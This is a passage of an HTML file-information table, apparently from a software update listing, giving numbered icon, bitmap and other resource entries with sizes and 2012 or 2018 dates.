applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7511</td><td>Not applicable</td><td>118</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7512</td><td>Not applicable</td><td>62</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7513</td><td>Not applicable</td><td>62</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7516</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7517</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7518</td><td>Not applicable</td><td>62</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>752.ico</td><td>Not applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7521.bmp</td><td>Not applicable</td><td>1,782</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7522.bmp</td><td>Not applicable</td><td>374</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7524.bmp</td><td>Not applicable</td><td>1,142</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7525.bmp</td><td>Not applicable</td><td>126</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7527.bmp</td><td>Not applicable</td><td>758</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7528.bmp</td><td>Not applicable</td><td>3,894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7529.bmp</td><td>Not applicable</td><td>630</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>753.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7531.bmp</td><td>Not applicable</td><td>32,886</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7533.bmp</td><td>Not applicable</td><td>1,654</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7535.bmp</td><td>Not applicable</td><td>15,990</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7536.bmp</td><td>Not applicable</td><td>95,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7537.bmp</td><td>Not applicable</td><td>5,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7539.bmp</td><td>Not applicable</td><td>3,702</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>754.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7541.bmp</td><td>Not applicable</td><td>11,216</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7546.bmp</td><td>Not applicable</td><td>238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7547.bmp</td><td>Not applicable</td><td>774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>755.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>756.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7563.bmp</td><td>Not applicable</td><td>374</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>757.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>758.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7580.bmp</td><td>Not applicable</td><td>1,654</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7581.bmp</td><td>Not applicable</td><td>1,654</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7582.bmp</td><td>Not applicable</td><td>1,654</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7583.bmp</td><td>Not applicable</td><td>1,654</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7584.bmp</td><td>Not applicable</td><td>1,654</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7585.bmp</td><td>Not applicable</td><td>1,654</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>759.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>76</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>76.ico</td><td>Not applicable</td><td>318</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>760.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7601</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7602</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7603</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7604</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7605</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7606</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7607</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7610</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7611</td><td>Not applicable</td><td>62</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7612</td><td>Not applicable</td><td>62</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7613</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7614</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>77</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>77.ico</td><td>Not applicable</td><td>3,774</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>7706.bmp</td><td>Not applicable</td><td>1,186</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7707.bmp</td><td>Not applicable</td><td>1,014</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7708.bmp</td><td>Not applicable</td><td>374</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7709.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7710.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7711.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7712.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7713.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7714.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7715.bmp</td><td>Not applicable</td><td>5,430</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7716</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7716.bmp</td><td>Not applicable</td><td>1,590</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7717.bmp</td><td>Not applicable</td><td>3,894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7718.bmp</td><td>Not applicable</td><td>246</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7720.bmp</td><td>Not applicable</td><td>12,342</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7721</td><td>Not applicable</td><td>48</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7721.bmp</td><td>Not applicable</td><td>1,526</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7722.bmp</td><td>Not applicable</td><td>5,750</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7730.bmp</td><td>Not applicable</td><td>16,438</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7731.bmp</td><td>Not applicable</td><td>16,438</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7732.bmp</td><td>Not applicable</td><td>16,438</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7733.bmp</td><td>Not applicable</td><td>15,414</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7734.bmp</td><td>Not applicable</td><td>15,414</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7735.bmp</td><td>Not applicable</td><td>3,126</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7736.bmp</td><td>Not applicable</td><td>248</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>7737.bmp</td><td>Not applicable</td><td>822</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>78</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>78.ico</td><td>Not applicable</td><td>2,238</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>79</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>79.ico</td><td>Not applicable</td><td>1,758</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>7910</td><td>Not applicable</td><td>20</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>7911</td><td>Not applicable</td><td>48</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>7912</td><td>Not applicable</td><td>624</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>7920</td><td>Not applicable</td><td>820</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>7921</td><td>Not applicable</td><td>16,416</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>7923</td><td>Not applicable</td><td>104</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>7924</td><td>Not applicable</td><td>17,408</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>7930</td><td>Not applicable</td><td>384</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>7931</td><td>Not applicable</td><td>132</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>7940</td><td>Not applicable</td><td>296</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>8</td><td>Not applicable</td><td>228</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8.jpg</td><td>Not applicable</td><td>1,906</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>80</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>80.ico</td><td>Not applicable</td><td>1,406</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>800</td><td>Not applicable</td><td>202</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>8000</td><td>Not applicable</td><td>360</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8001</td><td>Not applicable</td><td>1,092</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>8002</td><td>Not applicable</td><td>32</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8003</td><td>Not applicable</td><td>568</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8004</td><td>Not applicable</td><td>592</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8005</td><td>Not applicable</td><td>504</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8006</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8007</td><td>Not applicable</td><td>536</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8008</td><td>Not applicable</td><td>544</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8009</td><td>Not applicable</td><td>552</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>801</td><td>Not applicable</td><td>48</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>8010</td><td>Not applicable</td><td>552</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8011</td><td>Not applicable</td><td>472</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8012</td><td>Not applicable</td><td>600</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8013</td><td>Not applicable</td><td>576</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8014</td><td>Not applicable</td><td>552</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8015</td><td>Not applicable</td><td>536</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8016</td><td>Not applicable</td><td>56</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8017</td><td>Not applicable</td><td>112</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8018</td><td>Not applicable</td><td>56</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8019</td><td>Not applicable</td><td>576</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8020</td><td>Not applicable</td><td>488</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8021</td><td>Not applicable</td><td>472</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8022</td><td>Not applicable</td><td>448</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8023</td><td>Not applicable</td><td>536</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8024</td><td>Not applicable</td><td>528</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8025</td><td>Not applicable</td><td>56</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8026</td><td>Not applicable</td><td>312</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8028</td><td>Not applicable</td><td>552</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8029</td><td>Not applicable</td><td>592</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8030</td><td>Not applicable</td><td>24</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8031</td><td>Not applicable</td><td>512</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8032</td><td>Not applicable</td><td>576</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8037</td><td>Not applicable</td><td>40</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8041</td><td>Not applicable</td><td>112</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8044</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8045</td><td>Not applicable</td><td>552</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8046</td><td>Not applicable</td><td>536</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8049</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8050</td><td>Not applicable</td><td>8</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8051</td><td>Not applicable</td><td>40</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8052</td><td>Not applicable</td><td>376</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8053</td><td>Not applicable</td><td>88</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8054</td><td>Not applicable</td><td>32</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8055</td><td>Not applicable</td><td>24</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>81</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>81.ico</td><td>Not applicable</td><td>9,662</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>82</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>82.ico</td><td>Not applicable</td><td>4,286</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>83</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>83.ico</td><td>Not applicable</td><td>2,462</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>84</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>84.ico</td><td>Not applicable</td><td>1,150</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>85</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>85.ico</td><td>Not applicable</td><td>766</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>8500</td><td>Not applicable</td><td>144</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8509</td><td>Not applicable</td><td>1,772</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8527</td><td>Not applicable</td><td>8</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8529</td><td>Not applicable</td><td>62</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8530</td><td>Not applicable</td><td>128</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8531</td><td>Not applicable</td><td>92</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8534</td><td>Not applicable</td><td>1,660</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8535</td><td>Not applicable</td><td>104</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8536</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8551</td><td>Not applicable</td><td>70</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8562</td><td>Not applicable</td><td>118</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8563</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8580</td><td>Not applicable</td><td>72</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8584</td><td>Not applicable</td><td>4,950</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8585</td><td>Not applicable</td><td>9,153</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8586</td><td>Not applicable</td><td>2,116</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>86</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>86.ico</td><td>Not applicable</td><td>318</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>8600</td><td>Not applicable</td><td>38</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8601</td><td>Not applicable</td><td>114</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8602</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8603</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8604</td><td>Not applicable</td><td>60</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8605</td><td>Not applicable</td><td>156</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8607</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8608</td><td>Not applicable</td><td>32</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8609</td><td>Not applicable</td><td>32</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8610</td><td>Not applicable</td><td>32</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8611</td><td>Not applicable</td><td>32</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8612</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8613</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8614</td><td>Not applicable</td><td>188</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8615</td><td>Not applicable</td><td>30</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8616</td><td>Not applicable</td><td>36</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8617</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8618</td><td>Not applicable</td><td>24</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8619</td><td>Not applicable</td><td>38</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8620</td><td>Not applicable</td><td>22</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8621</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8623</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8624</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8625</td><td>Not applicable</td><td>38</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8626</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8627</td><td>Not applicable</td><td>28</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8628</td><td>Not applicable</td><td>30</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8629</td><td>Not applicable</td><td>38</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8630</td><td>Not applicable</td><td>400</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8631</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8632</td><td>Not applicable</td><td>124</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8633</td><td>Not applicable</td><td>60</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8634</td><td>Not applicable</td><td>30</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8635</td><td>Not applicable</td><td>144</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8636</td><td>Not applicable</td><td>30</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8637</td><td>Not applicable</td><td>30</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8638</td><td>Not applicable</td><td>74</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8639</td><td>Not applicable</td><td>70</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8640</td><td>Not applicable</td><td>24</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8641</td><td>Not applicable</td><td>24</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8643</td><td>Not applicable</td><td>168</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8644</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8645</td><td>Not applicable</td><td>122</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8649</td><td>Not applicable</td><td>260</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8650</td><td>Not applicable</td><td>378</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8651</td><td>Not applicable</td><td>112</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8652</td><td>Not applicable</td><td>104</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8653</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8654</td><td>Not applicable</td><td>100</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8655</td><td>Not applicable</td><td>58</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8656</td><td>Not applicable</td><td>154</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8657</td><td>Not applicable</td><td>24</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8660</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8662</td><td>Not applicable</td><td>76</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8663</td><td>Not applicable</td><td>60</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8667</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8668</td><td>Not applicable</td><td>68</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8669</td><td>Not applicable</td><td>70</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8670</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8675</td><td>Not applicable</td><td>46</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8676</td><td>Not applicable</td><td>54</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8695</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8699</td><td>Not applicable</td><td>60</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>87</td><td>Not applicable</td><td>308</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>87.ico</td><td>Not applicable</td><td>766</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>8700</td><td>Not applicable</td><td>98</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8702</td><td>Not applicable</td><td>184</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8703</td><td>Not applicable</td><td>30</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8720</td><td>Not applicable</td><td>96</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8721</td><td>Not applicable</td><td>90</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>8723</td><td>Not 